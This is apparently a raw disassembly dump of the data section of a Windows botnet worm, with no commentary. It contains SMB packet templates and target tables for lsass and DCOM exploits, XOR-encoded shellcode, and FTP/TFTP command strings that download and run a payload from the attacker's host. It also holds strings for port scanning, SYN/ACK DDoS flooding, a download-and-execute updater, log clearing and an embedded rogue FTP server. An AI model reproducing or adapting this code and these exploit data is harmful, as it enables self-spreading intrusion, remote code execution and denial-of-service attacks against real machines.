aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
aLanman1_0 db 'LANMAN1.0',0
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
aLm1_2x002 db 'LM1.2X002',0
dw 4C02h
aAnman2_1 db 'ANMAN2.1',0
db 2, 4Eh, 54h
aLm0_12 db ' LM 0.12',0
align 4
dword_41E0F4 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401FD7+A2�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dword_41E1A0 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401FD7+C9�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_41E280 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401B98+58�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC_2: ; DATA XREF: sub_401B98+8A�o
unicode 0, <C$>,0
a????? db '?????',0
dd 0
dword_41E2E4 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401B98+2AA�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_41E350 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401B98+2D1�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_41E3F4 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401B98+3B0�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
off_41E474 dd offset loc_401495 ; DATA XREF: sub_401B98+3DE�o
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40707B+1
dd 1, 0
dd 1, 0
dd offset loc_40707B+1
dd 1, 0
dd 1, 0
dd offset loc_40707B+1
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_41E508 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401B98+306�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_41E574 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401B98+331�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_41E5E8 dd 0 ; DATA XREF: sub_401B98+35F�o
dd offset loc_40A89A
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40A89A
dd 1, 0
dd 1, 0
dd offset loc_40A89A
dd 1, 0
dd 1, 0
dd offset loc_40A89A
dd 1, 0
dd 1, 2 dup(0)
word_41E670 dw 0AD9Dh ; DATA XREF: sub_401A39+30�r
; sub_401B98+E7�r
align 4
dd 2 dup(0)
aWinxpProfessio db 'WinXP Professional [universal] lsass.exe ',0
align 10h
dword_41E6B0 dd 1004600h ; DATA XREF: sub_401B98+140�r
; sub_401B98+245�r
dd 1, 326E6957h, 7250206Bh, 7365666Fh, 6E6F6973h, 20206C61h
dd 755B2020h, 6576696Eh, 6C617372h, 656E205Dh, 70617274h
dd 6C6C642Eh, 2 dup(0)
dd 7515123Ch, 2, 326E6957h, 6441206Bh, 636E6176h, 53206465h
dd 65767265h, 535B2072h, 205D3450h, 20202020h, 656E2020h
dd 70617274h, 6C6C642Eh, 2 dup(0)
dd 751C123Ch, 0Fh dup(0)
; char aS_0[]
aS_0 db '%s',0Dh,0Ah,0 ; DATA XREF: sub_401A39+100�o
; sub_409557+3916�o ...
align 10h
; char aEchoOpenSDOEch[]
aEchoOpenSDOEch db 'echo open %s %d > o&echo user 1 1 >> o &echo get Samsong.exe >> o'
; DATA XREF: sub_401A39+BC�o
db ' &echo quit >> o &ftp -n -s:o &Samsong.exe',0Dh,0Ah,0
align 10h
; char aTftpISGetS[]
aTftpISGetS db 'tftp -i %s get %s',0Dh,0Ah,0 ; DATA XREF: sub_401A39+97�o
dword_41E7F4 dd 6EB06EBh, 0 ; DATA XREF: sub_401B98+177�o
; char aSIpc[]
aSIpc db '\\%s\ipc$',0 ; DATA XREF: sub_401B98+27�o
align 4
dword_41E808 dd 1CEC8166h ; DATA XREF: sub_401B98+D�r
dword_41E80C dd 0E4FF07h ; DATA XREF: sub_401B98+16�r
dd 4A5A10EBh, 0B966C933h, 3480017Dh, 0FAE2990Ah, 0EBE805EBh
dd 70FFFFFFh, 99999895h, 0A938FDC3h, 12999999h, 0E91295D9h
dd 0D9123485h, 12411291h, 0ED12A5EAh, 6A9AE187h, 9AB9E712h
dd 8DD71262h, 0CECF74AAh, 9AA612C8h, 0F36B1262h, 3F6AC097h
dd 0C6C091EDh, 0DC9D5E1Ah, 0C6C0707Bh, 125412C7h, 5A9ABDDFh
dd 589A7848h, 12FF50AAh, 85DF1291h, 78585A9Ah, 12589A9Bh
dd 125A9A99h, 1A6E1263h, 4912975Fh, 71C09AF3h, 9999991Eh
dd 0CB945F1Ah, 65CE66CFh, 0F34112C3h, 0ED71C09Ch, 0C9999999h
dd 0F3C9C9C9h, 669BF398h, 411275CEh, 999B9E5Eh, 59AA4B9Dh
dd 0F39DDE10h, 66CACE89h, 98F369CEh, 6DCE66CAh, 66CAC9C9h
dd 491261CEh, 12DD751Ah, 0F359AA6Dh, 9D10C089h, 10627B17h
dd 0CF10A1CFh, 0D9CF10A5h, 0B5DF5EFFh, 0DE149898h, 0AACFC989h
dd 0C8C8C850h, 0C8C898F3h, 0FAA5DE5Eh, 1499FDF4h, 0C8C9A5DEh
dd 0CB79CE66h, 0CA65CE66h, 0C965CE66h, 0AA7DCE66h, 591C3559h
dd 0CBC860ECh, 4B66CACFh, 7B32C0C3h, 5A59AA77h, 66677671h
dd 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh, 0F8FCEBDAh
dd 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh, 0CDEDF0E1h, 0F8FCEBF1h
dd 0F6D599FDh, 0F0D5FDF8h, 0EBF8EBFBh, 0EE99D8E0h, 0AAC6ABEAh
dd 0CACE99ABh, 0FAF6CAD8h, 0D8EDFCF2h, 0F7F0FB99h, 0F0F599FDh
dd 0F7FCEDEAh, 0FAFAF899h, 99EDE9FCh, 0EAF6F5FAh, 0FAF6EAFCh
dd 99EDFCF2h, 0
dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
dd 0FEFF0000h, 0
dd 2006200h, 4E204350h, 4F575445h, 50204B52h, 52474F52h
dd 31204D41h, 200302Eh, 4D4E414Ch, 2E314E41h, 57020030h
dd 6F646E69h, 66207377h, 5720726Fh, 676B726Fh, 70756F72h
dd 2E332073h, 2006131h, 2E314D4Ch, 30305832h, 4C020032h
dd 414D4E41h, 312E324Eh, 544E0200h, 204D4C20h, 32312E30h
dd 0
dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows20002_0:
unicode 0, <Windows 2000 2195>,0
aWindows20005_1:
unicode 0, <Windows 2000 5.0>,0
align 4
dd 0
dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h, 240043h, 3F3F0000h, 3F3F3Fh, 0
dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
dd offset loc_401495
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40707B+1
dd 1, 0
dd 1, 0
dd offset loc_40707B+1
dd 1, 0
dd 1, 0
dd offset loc_40707B+1
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 2 dup(0)
dd offset loc_40A89A
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40A89A
dd 1, 0
dd 1, 0
dd offset loc_40A89A
dd 1, 0
dd 1, 0
dd offset loc_40A89A
dd 1, 0
dd 1, 3 dup(0)
aWinxpProfess_0 db 'WinXP Professional [universal] lsass.exe ',0
align 4
dd 0
dd 1004600h, 1, 326E6957h, 7250206Bh, 7365666Fh, 6E6F6973h
dd 20206C61h, 755B2020h, 6576696Eh, 6C617372h, 656E205Dh
dd 70617274h, 6C6C642Eh, 2 dup(0)
dd 7515123Ch, 2, 326E6957h, 6441206Bh, 636E6176h, 53206465h
dd 65767265h, 535B2072h, 205D3450h, 20202020h, 656E2020h
dd 70617274h, 6C6C642Eh, 2 dup(0)
dd 751C123Ch, 0
aAsn1smbnt db 'asn1smbnt',0 ; DATA XREF: sub_4027F8+164�o
aDcom135 db 'Dcom135',0 ; DATA XREF: sub_4013EE+2DD�o
; .text:004019D0�o ...
align 4
dd 5 dup(0)
dword_41F090 dd 87h ; DATA XREF: sub_4021A2+1E�r
; sub_409557+2913�r ...
off_41F094 dd offset sub_4013EE ; DATA XREF: sub_4027F8+1E6�r
dword_41F098 dd 0 ; DATA XREF: sub_4013EE+332�w
; sub_4013EE+338�r ...
dword_41F09C dd 1 ; DATA XREF: sub_4022E3+1F�r
dword_41F0A0 dd 1 ; DATA XREF: sub_4022E3:loc_402554�r
aDcom445 db 'dcom445',0
dd 63440000h, 34346D6Fh, 35h, 5 dup(0)
dd 1BDh, 4013EEh, 0
dd 2 dup(1), 6D6F6364h, 35323031h, 63440000h, 30316D6Fh
dd 3532h, 5 dup(0)
dd 401h, 4013EEh, 0
dd 2 dup(1), 6D6F6364h, 32h, 63440000h, 326D6Fh, 6 dup(0)
dd 87h, 40178Dh, 0
dd 2 dup(1), 316E7361h, 626D73h, 736C0000h, 5F737361h
dd 353434h, 5 dup(0)
dd 1BDh, 401FD7h, 0
dd 2 dup(1), 73616364h, 73h, 63640000h, 737361h, 6 dup(0)
dd 1BDh, 401734h, 0
dd 2 dup(1), 7361736Ch, 33315F73h, 736C0039h, 5F737361h
dd 393331h, 5 dup(0)
dd 1BDh, 401FD7h, 0
dd 2 dup(1), 0Fh dup(0)
aLsass_139 db 'lsass_139',0
byte_41F252 db 1 ; DATA XREF: sub_409557:loc_40D794�r
; sub_409557+4247�o
aDcom1025 db 'dcom1025',0
dd 63640100h, 737361h, 0
dd 61736C01h, 345F7373h, 1003534h, 6D6F6364h, 32h, 10000h
dd 3 dup(0)
dd 4A5A10EBh, 0B966C933h, 34800166h, 0FAE2990Ah, 0EBE805EBh
dd 70FFFFFFh, 99999899h, 699521C3h, 9912E664h, 3485E912h
dd 1291D912h, 0A5EA1241h, 0EF126A9Ah, 126A9AE1h, 629AB9E7h
dd 0AA8DD712h, 0C8CECF74h, 629AA612h, 97F36B12h, 0ED3F6AC0h
dd 1AC6C091h, 7BDC9D5Eh, 0C7C6C070h, 0DF125412h, 485A9ABDh
dd 0AA589A78h, 9112FF50h, 9A85DF12h, 9B78585Ah, 9912589Ah
dd 63125A9Ah, 5F1A6E12h, 0F3491297h, 0E571C09Ah, 1A999999h
dd 0CFCB945Fh, 0C365CE66h, 9DF34112h, 99F071C0h, 0C9C99999h
dd 98F3C9C9h, 0CE669BF3h, 5E411269h, 9E999B9Eh, 1059AA24h
dd 89F39DDEh, 0CE66CACEh, 0CA98F36Dh, 0C961CE66h, 0CE66CAC9h
dd 0DD751A65h, 42AA6D12h, 10C089F3h, 627B1785h, 10A1DF10h
dd 0DF10A5DFh, 0B5DF5ED9h, 99999898h, 0C989DE14h, 0CACACACFh
dd 0CACA98F3h, 0FAA5DE5Eh, 1499FDF4h, 0CAC9A5DEh, 0C97DCE66h
dd 0AA71CE66h, 591C3559h, 0CBC860ECh, 4B66CACFh, 7B32C0C3h
dd 5A59AA77h, 66676271h, 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h
dd 99EAEAFCh, 0F8FCEBDAh, 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh
dd 0C9EDF0E1h, 0FCFAF6EBh, 0D599EAEAh, 0D5FDF8F6h, 0F8EBFBF0h
dd 99D8E0EBh, 0C6ABEAEEh, 0CE99ABAAh, 0F6CAD8CAh, 0EDFCF2FAh
dd 0F0FB99D8h, 0F599FDF7h, 0FCEDEAF0h, 0FAF899F7h, 0EDE9FCFAh
dd 99h
; char aTotalDInS_[]
aTotalDInS_ db ' Total: %d in %s.',0 ; DATA XREF: sub_4021A2+81�o
align 10h
; char aSD[]
aSD db ' %s: %d,',0 ; DATA XREF: sub_4021A2+42�o
align 4
; char aScanExploitSta[]
aScanExploitSta db '[SCAN]: Exploit Statistics:',0 ; DATA XREF: sub_4021A2+11�o
; char aScanScanNotAct[]
aScanScanNotAct db '[SCAN]: Scan not active.',0 ; DATA XREF: sub_40226C+42�o
align 4
; char aScanCurrentIpS[]
aScanCurrentIpS db '[SCAN]: Current IP: %s.',0 ; DATA XREF: sub_40226C+2C�o
; char aHttpdFailedToS[]
aHttpdFailedToS db '[HTTPD]: Failed to start server, error: <%d>.',0
; DATA XREF: sub_4022E3+36F�o
align 4
; char aHttpdServerLis[]
aHttpdServerLis db '[HTTPD]: Server listening on IP: %s:%d, Directory: %s\.',0
; DATA XREF: sub_4022E3+307�o
; sub_409557+4773�o
aFtpFailedToSta db '[FTP]: Failed to start server, error: <%d>.',0
; DATA XREF: sub_4022E3+267�o
; char aFtpServerStart[]
aFtpServerStart db '[FTP]: Server started on Port: %d, File: %s, Request: %s.',0
; DATA XREF: sub_4022E3+1FA�o
align 4
; char aTftpFailedToSt[]
aTftpFailedToSt db '[TFTP]: Failed to start server, error: <%d>.',0
; DATA XREF: sub_4022E3+149�o
align 4
; char aTftpServerStar[]
aTftpServerStar db '[TFTP]: Server started on Port: %d, File: %s, Request: %s.',0
; DATA XREF: sub_4022E3+DB�o
; sub_409557+45FD�o
align 4
; char aD_D_D_D[]
aD_D_D_D db '%d.%d.%d.%d',0 ; DATA XREF: sub_4026BF+38�o
; sub_408401+46�o
; char aScanIpSPortDIs[]
aScanIpSPortDIs db '[SCAN]: IP: %s, Port %d is open.',0 ; DATA XREF: sub_4027F8+EB�o
align 4
; char aScanIpSDScanTh[]
aScanIpSDScanTh db '[SCAN]: IP: %s:%d, Scan thread: %d, Sub-thread: %d.',0
; DATA XREF: sub_4027F8+93�o
; char aScanFinishedAt[]
aScanFinishedAt db '[SCAN]: Finished at %s:%d after %d minute(s) of scanning.',0
; DATA XREF: sub_402A0C+1CE�o
align 4
; char aScanFailedToSt[]
aScanFailedToSt db '[SCAN]: Failed to start worker thread, error: <%d>.',0
; DATA XREF: sub_402A0C+173�o
; char aScanSDScanThre[]
aScanSDScanThre db '[SCAN]: %s:%d, Scan thread: %d, Sub-thread: %d.',0
; DATA XREF: sub_402A0C+103�o
; char aScanFailedToIn[]
aScanFailedToIn db '[SCAN]: Failed to initialize critical section.',0
; DATA XREF: sub_402A0C+87�o
align 4
; char aD_SS[]
aD_SS db '%d. %s = %s',0 ; DATA XREF: sub_402CEB+35�o
aAliasList db '-[Alias List]-',0 ; DATA XREF: sub_402CEB+10�o
align 4
; char a_2d_2d4d_2d_2d[]
a_2d_2d4d_2d_2d db '[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s',0 ; DATA XREF: sub_402D63+60�o
align 4
aLogsCleared_ db '[LOGS]: Cleared.',0 ; DATA XREF: sub_402E03+1A�o
align 10h
; char aLogListComplet[]
aLogListComplet db '[LOG]: List complete.',0 ; DATA XREF: sub_402E75+DC�o
align 4
aLogBegin db '[LOG]: Begin',0 ; DATA XREF: sub_402E75+3F�o
align 4
dword_41F768 dd 78h ; DATA XREF: sub_403014+A�r
align 10h
dword_41F770 dd 80000002h, 424B3Ch, 80000002h, 424B6Ch, 80000001h, 424BA4h
; DATA XREF: sub_402FA4+7�o
; char Mode[]
Mode db 'rb',0 ; DATA XREF: sub_402FA4+63�o
; sub_403067+B�o ...
align 4
; char aDdosDoneWithFl[]
aDdosDoneWithFl db '[DDoS]: Done with flood (%iKB/sec).',0 ; DATA XREF: sub_4030D9+5B�o
; char aDdosSendErrorD[]
aDdosSendErrorD db '[DDoS]: Send error: <%d>.',0 ; DATA XREF: sub_40318B+302�o
align 4
; char aDdos_random[]
aDdos_random db 'ddos.random',0 ; DATA XREF: sub_40318B:loc_4032B7�o
; sub_409557+1EAC�o
; char aDdos_ack[]
aDdos_ack db 'ddos.ack',0 ; DATA XREF: sub_40318B:loc_40329B�o
; sub_409557+1E95�o
align 4
; char Str2[]
Str2 db 'ddos.syn',0 ; DATA XREF: sub_40318B+F1�o
; sub_409557+1E7E�o
align 10h
; char aDownloadBadUrl[]
aDownloadBadUrl db '[DOWNLOAD]: Bad URL, or DNS Error: %s.',0 ; DATA XREF: sub_403520+493�o
align 4
aDownloadUpda_0 db '[DOWNLOAD]: Update failed: Error executing file: %s.',0
; DATA XREF: sub_403520+485�o
align 10h
; char aDownloadDown_0[]
aDownloadDown_0 db '[DOWNLOAD]: Downloaded %.1fKB to %s @ %.1fKB/sec. Updating.',0
; DATA XREF: sub_403520+3C9�o
; char aDownloadOpened[]
aDownloadOpened db '[DOWNLOAD]: Opened: %s.',0 ; DATA XREF: sub_403520+358�o
; char aOpen[]
aOpen db 'open',0 ; DATA XREF: sub_403520+336�o
; sub_409557+15D5�o ...
align 4
; char aDownloadDownlo[]
aDownloadDownlo db '[DOWNLOAD]: Downloaded %.1f KB to %s @ %.1f KB/sec.',0
; DATA XREF: sub_403520+2E1�o
; char aDownloadCrcFai[]
aDownloadCrcFai db '[DOWNLOAD]: CRC Failed (%d != %d).',0 ; DATA XREF: sub_403520+262�o
align 4
; char aDownloadFilesi[]
aDownloadFilesi db '[DOWNLOAD]: Filesize is incorrect: (%d != %d).',0
; DATA XREF: sub_403520+1D8�o
align 4
; char aDownloadUpdate[]
aDownloadUpdate db '[DOWNLOAD]: Update: %s (%dKB transferred).',0
; DATA XREF: sub_403520+195�o
align 10h
aDownloadFileDo db '[DOWNLOAD]: File download: %s (%dKB transferred).',0
; DATA XREF: sub_403520+183�o
align 4
; char aDownloadCouldn[]
aDownloadCouldn db '[DOWNLOAD]: Couldn',27h,'t open file: %s.',0 ; DATA XREF: sub_403520+77�o
aUnknown db 'Unknown',0 ; DATA XREF: sub_403AC8:loc_403B0B�o
; sub_407BAB+104�o
aInvalid db 'Invalid',0 ; DATA XREF: sub_403AC8:loc_403B05�o
aDisk db 'Disk',0 ; DATA XREF: sub_403AC8:loc_403AFF�o
align 10h
aNetwork db 'Network',0 ; DATA XREF: sub_403AC8:loc_403AF9�o
aCdrom db 'Cdrom',0 ; DATA XREF: sub_403AC8:loc_403AF3�o
align 10h
aRam db 'RAM',0 ; DATA XREF: sub_403AC8:loc_403AED�o
word_41F9E4 dw 3Fh ; DATA XREF: sub_403AC8+1F�o
; sub_410E85:loc_410F87�r
align 4
; char aFailed[]
aFailed db 'failed',0 ; DATA XREF: sub_403B59:loc_403C31�o
; sub_403C74+3B�o
align 10h
; char aSkb[]
aSkb db '%sKB',0 ; DATA XREF: sub_403B59+6B�o
align 4
; char aMainSDriveSSTo[]
aMainSDriveSSTo db '[MAIN]: %s Drive (%s): %s total, %s free, %s available.',0
; DATA XREF: sub_403C74+8E�o
; char aMainSDriveSFai[]
aMainSDriveSFai db '[MAIN]: %s Drive (%s): Failed to stat, device not ready.',0
; DATA XREF: sub_403C74+58�o
align 4
; char aA[]
aA db 'A:\',0 ; DATA XREF: sub_403D46:loc_403D8B�o
dword_41FA70 dd 30B0005h, 10h, 48h, 1, 16D016D0h, 0 ; DATA XREF: sub_403EEB+A4�o
dd 1, 10000h, 0AFA8BD80h, 11C97D8Ah, 8F4BEh, 8929102Bh
dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_41FABC dd 3000005h, 10h, 18h, 1, 3 dup(0) ; DATA XREF: sub_403EEB+E3�o
dword_41FAD8 dd 975201B0h, 11D059CAh, 0A000D5A8h, 51800DC9h, 0
; DATA XREF: sub_403EEB+118�o
dword_41FAEC dd 1D55B526h, 46C5C137h, 8F6379ABh, 69E8682Ah, 0
; DATA XREF: sub_403EEB+13F�o
a221GoodbyeHapp db '221 Goodbye happy r00ting.',0Ah,0 ; DATA XREF: sub_404059+5CB�o
; char aQuit[]
aQuit db 'QUIT',0 ; DATA XREF: sub_404059+5B7�o
; sub_409557+522�o
align 4
a425CanTOpenDat db '425 Can',27h,'t open data connection.',0Ah,0
; DATA XREF: sub_404059+5AA�o
align 4
; char aFtpFileTransfe[]
aFtpFileTransfe db '[FTP]: File transfer complete to IP: %s (%s).',0
; DATA XREF: sub_404059+55F�o
align 4
a226TransferC_0 db '226 Transfer complete.',0Ah,0 ; DATA XREF: sub_404059+546�o
a150OpeningBina db '150 Opening BINARY mode data connection',0Ah,0
; DATA XREF: sub_404059+51A�o
align 4
; char aRetr[]
aRetr db 'RETR',0 ; DATA XREF: sub_404059+502�o
align 4
a200PortCommand db '200 PORT command successful.',0Ah,0 ; DATA XREF: sub_404059+4ED�o
align 4
; char aS_S_S_S[]
aS_S_S_S db '%s.%s.%s.%s',0 ; DATA XREF: sub_404059+4DC�o
; char aXX[]
aXX db '%x%x',0Ah,0 ; DATA XREF: sub_404059+4A9�o
align 4
; char aS_1[]
aS_1 db '%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^',0Ah ; DATA XREF: sub_404059+468�o
db ']',0
; char aPort[]
aPort db 'PORT',0 ; DATA XREF: sub_404059+42F�o
align 4
a226TransferCom db '226 Transfer complete',0Ah,0 ; DATA XREF: sub_404059+401�o
align 10h
; char aList[]
aList db 'LIST',0 ; DATA XREF: sub_404059+3EE�o
align 4
a425PassiveNotS db '425 Passive not supported on this server',0Ah,0
; DATA XREF: sub_404059+3B3�o
align 4
; char aPasv[]
aPasv db 'PASV',0 ; DATA XREF: sub_404059+3A0�o
align 4
a200TypeSetToI_ db '200 Type set to I.',0Ah,0 ; DATA XREF: sub_404059+390�o
; char aI[]
aI: ; DATA XREF: sub_404059+37C�o
unicode 0, <I>,0
a200TypeSetToA_ db '200 Type set to A.',0Ah,0 ; DATA XREF: sub_404059+355�o
; char aA_0[]
aA_0: ; DATA XREF: sub_404059+341�o
unicode 0, <A>,0
; char aType[]
aType db 'TYPE',0 ; DATA XREF: sub_404059+32A�o
; sub_404059+365�o
align 4
a257IsCurrentDi db '257 "/" is current directory.',0Ah,0 ; DATA XREF: sub_404059+31A�o
align 4
; char off_41FCD4[]
off_41FCD4 dd offset dword_445750 ; DATA XREF: sub_404059+306�o
a350Restarting_ db '350 Restarting.',0Ah,0 ; DATA XREF: sub_404059+2F6�o
align 4
; char aRest[]
aRest db 'REST',0 ; DATA XREF: sub_404059+2E2�o
align 4
a215Stnyftpd db '215 StnyFtpd',0Ah,0 ; DATA XREF: sub_404059+2D2�o
align 4
; char aSyst[]
aSyst db 'SYST',0 ; DATA XREF: sub_404059+2BE�o
align 4
a230UserLoggedI db '230 User logged in.',0Ah,0 ; DATA XREF: sub_404059+2AE�o
align 4
; char aPass[]
aPass db 'PASS',0 ; DATA XREF: sub_404059+29A�o
align 4
a331PasswordReq db '331 Password required',0Ah,0 ; DATA XREF: sub_404059+28A�o
align 4
; char aUser[]
aUser db 'USER',0 ; DATA XREF: sub_404059+275�o
align 4
; char aSS_1[]
aSS_1 db '%s %s',0 ; DATA XREF: sub_404059+264�o
align 4
a220Stnyftpd0wn db '220 StnyFtpd 0wns j0',0Ah,0 ; DATA XREF: sub_404059+1DC�o
align 4
; char aHttpdErrorServ[]
aHttpdErrorServ db '[HTTPD]: Error: server failed, returned: <%d>.',0
; DATA XREF: sub_404771+3F8�o
align 4
; char asc_41FD9C[]
asc_41FD9C db 0Dh,0Ah,0 ; DATA XREF: sub_404771+2CF�o
align 10h
; char Delim[]
Delim: ; DATA XREF: sub_404771+293�o
; sub_409557+A8�o ...
unicode 0, < >,0
; char SubStr[]
SubStr db 'GET ',0 ; DATA XREF: sub_404771+269�o
align 4
; char aHttp1_0200Ok_0[]
aHttp1_0200Ok_0 db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: sub_404BCC+F6�o
db 'Server: myBot',0Dh,0Ah
db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah
db 'pragma: no-cache',0Dh,0Ah
db 'Content-Type: %s',0Dh,0Ah
db 'Content-Length: %i',0Dh,0Ah
db 'Accept-Ranges: bytes',0Dh,0Ah
db 'Date: %s %s GMT',0Dh,0Ah
db 'Last-Modified: %s %s GMT',0Dh,0Ah
db 'Expires: %s %s GMT',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 4
; char aHttp1_0200OkSe[]
